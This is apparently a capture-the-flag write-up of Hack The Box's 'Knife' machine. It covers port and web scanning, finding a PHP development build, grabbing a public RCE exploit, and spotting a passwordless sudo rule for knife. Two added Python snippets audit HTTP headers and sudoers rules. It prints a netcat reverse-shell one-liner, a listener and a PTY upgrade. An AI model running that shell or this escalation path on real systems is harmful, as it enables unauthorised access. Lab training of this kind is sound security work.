Hello all, apologies for the extreme delay, but I decided to take a mini break to get a better understanding of privilege escalation on Windows and Linux.
This week I decided to hit Knife from Hackthebox.
Let's take it away now!
nmap -sC -sV -T4 -p- -oN nmap.txt 10.10.10.242
- 22 OpenSSH 8.2p1 Ubuntu
- 80 Apache HttpD 2.4.41
First things first, I am going to head over to the website.
Nothing too interesting here, I clicked around a bit but I was not able to get to any other pages from the landing page.
I am going to run Dirb while I continue to investigate this.
dirb http://10.10.10.242/ -o Dirb
index.php brings up the main landing page again and server-status brings up an error page.
But we now know one thing we didn't before: we are dealing with a PHP site.
I am going to try another tool to see if we can get any useful information. Let's fire up Nikto, a free command-line vulnerability scanner that checks web servers for dangerous files/CGIs, outdated software and other problems.
nikto -h 10.10.10.242
Scrolling down, we can see that the header is PHP/8.1.0-Dev.
Let's also run curl to investigate the site.
curl http://10.10.10.242 -v
The PHP version is shown here again.
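The curl and Nikto output above is a textbook case of version disclosure: the server volunteers its PHP build in a response header, and that build is a development snapshot. Below is an added example (my own code, not from the original writeup) that parses a raw HTTP response and flags headers that leak a version or advertise a pre-release build. The response text is constructed for the demo, modelled on what curl -v prints; the header names are the standard ones.

```python
# Added example (not part of the original writeup): flag version disclosure
# and pre-release builds in HTTP response headers.
import re
from typing import Dict, List

# Constructed sample response (not captured from the box), modelled on curl -v output.
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Date: Mon, 01 Jan 2024 00:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
Connection: close

<html><body>hello</body></html>
"""

# Headers that commonly leak the software stack and its version.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
# Suffixes that mark a pre-release build, which should not be serving production traffic.
PRERELEASE = re.compile(r"-(dev|alpha|beta|rc\d*|snapshot)\b", re.IGNORECASE)
VERSION = re.compile(r"\d+\.\d+(\.\d+)?")


def parse_headers(raw: str) -> Dict[str, str]:
    """Return a lower-cased header-name -> value map from a raw HTTP response."""
    raw = raw.replace("\r\n", "\n")
    head, _, _ = raw.partition("\n\n")  # headers end at the first blank line
    headers: Dict[str, str] = {}
    for line in head.splitlines()[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(raw: str) -> List[Dict[str, str]]:
    """Report every disclosure header that carries a version, and any pre-release build."""
    findings: List[Dict[str, str]] = []
    for name, value in parse_headers(raw).items():
        if name not in DISCLOSURE_HEADERS:
            continue
        if VERSION.search(value):
            findings.append({"header": name, "value": value, "issue": "version disclosure"})
        if PRERELEASE.search(value):
            findings.append({"header": name, "value": value, "issue": "pre-release build exposed"})
    return findings


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_RESPONSE):
        print(f"{finding['issue']}: {finding['header']}: {finding['value']}")
```

On the defensive side, the fix for the header itself is `expose_php = Off` in php.ini and `ServerTokens Prod` in the Apache configuration; the fix for the finding that matters is not running a development build of the interpreter on an internet-facing host at all.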
I am going to do some more research on this and head over to Google.
The first entry is for an RCE!
Download this and move it into your working directory. Run pwd to make sure you are moving it to the right location.
mv /home/huey/Desktop/49933.py /home/huey/Documents/HTB/Knife/49933.py
We can see NOPASSWD: /usr/bin/knife in the sudo configuration, which might have an entry in GTFOBins.
Let's get a better shell first though. On the target, run this reverse shell (replace the address with your tun0 IP; the listener below must already be running):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your tun0 IP> 1234 >/tmp/f
On your machine, the listener:
nc -nvlp 1234
Once the shell connects back, upgrade it to a proper TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now head over to GTFOBins and search for knife.
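The NOPASSWD rule for /usr/bin/knife is the kind of entry a sudoers review should catch before an attacker does. As an added example (my own code, not from the writeup or the box), here is a small auditor that parses sudoers-style rules and flags passwordless entries, distinguishing a blanket NOPASSWD: ALL from a single command that still needs checking against GTFOBins. The sudoers content is constructed for the demo; only the knife rule mirrors what the writeup found.

```python
# Added example (not part of the original writeup): audit sudoers-style rules
# for passwordless entries. The sample below is constructed, not the box's real file.
import re
from typing import Dict, List

SAMPLE_SUDOERS = """# /etc/sudoers (constructed sample)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
deploy  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) /usr/bin/rsync
"""

# user  host=(runas) [TAG: ...] commands   -- the common sudoers rule shape
RULE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text: str) -> List[Dict[str, str]]:
    """Parse user specification lines; comments, blanks and Defaults are skipped."""
    rules: List[Dict[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if m:
            rules.append({k: v.strip() for k, v in m.groupdict().items()})
    return rules


def audit_sudoers(text: str) -> List[Dict[str, str]]:
    """Flag every NOPASSWD rule; a blanket ALL is high, a single command needs review."""
    findings: List[Dict[str, str]] = []
    for rule in parse_rules(text):
        tags = rule["tags"].upper()
        if "NOPASSWD" not in tags:
            continue
        if rule["cmds"] == "ALL":
            findings.append({**rule, "severity": "high",
                             "issue": "passwordless sudo for any command"})
        else:
            findings.append({**rule, "severity": "medium",
                             "issue": "passwordless command; check GTFOBins for a shell escape"})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['who']} -> ({f['runas']}) {f['cmds']}: {f['issue']}")
```

Remediation for the medium finding is either dropping NOPASSWD or pinning the rule to exact arguments so the binary cannot be driven into an interactive shell; the high finding is simply a root account under another name.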